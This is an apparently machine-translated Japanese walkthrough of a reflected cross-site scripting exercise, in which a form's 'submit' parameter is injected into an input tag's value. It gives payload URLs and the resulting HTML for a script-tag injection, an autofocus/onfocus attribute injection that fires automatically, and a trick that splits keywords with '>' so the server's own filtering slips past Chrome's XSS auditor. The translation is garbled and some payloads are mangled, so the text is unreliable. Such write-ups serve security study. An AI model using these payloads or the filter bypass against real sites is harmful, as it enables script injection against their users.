名前を入力して[送信]をクリックします。 URLの2つのパラメータを見ることができるように、フォームはGETリクエストによって送信されます。両方ともHTMLレスポンスに反映されます。
名=スポンジ&は、代わりにを提出上の名前パラメータ焦点=
<font size=3>Enter Your Name here : <input type="text" name="name" value='spongebob'></input>
<input type="submit" name="submit" value="">
を提出します。フィルタリングされない二重引用符で囲まれています。文字>が削除されているので、タグを閉じることができないので、タグの内部に注入が行われなければなりません。 >剥ぎ取られる:
名=スポンジボブ&提出=%22%3E%3Cscript%3Ealert(document.URL)%の3C /スクリプトは%3E
<input type="submit" name="submit" value=""<scriptalert(document.URL)</script">
それはONFOCUSを組み合わせることにより、自動的にJavaScriptを実行することが可能ですオートフォーカス。
名=スポンジボブ&提出=%22%20autofocus%20onfocus =%22alert(document.URL)
<input type="submit" name="submit" value="" autofocus onfocus="(document.URL)">
この
はなく、ChromeでFirefoxで自動的に実行されます作業XSSであるChromeのXSS監査理由XSSが反射していることを検出します。 Chromeは提出パラメータがHTMLに反映されていることを検出することはできませんので、
Chrome XSS auditor reports that 'Token contains a reflecte XSS vector'
それでは、私たちに有利に「>」のサーバー側のフィルタリングを使用してみましょう。
名=スポンジ&は= "%の20auto>注力%20onf> ocus =" 警告(DOC> ument.URL)
Chrome XSS auditor bypassed using because of server side filtering
を提出します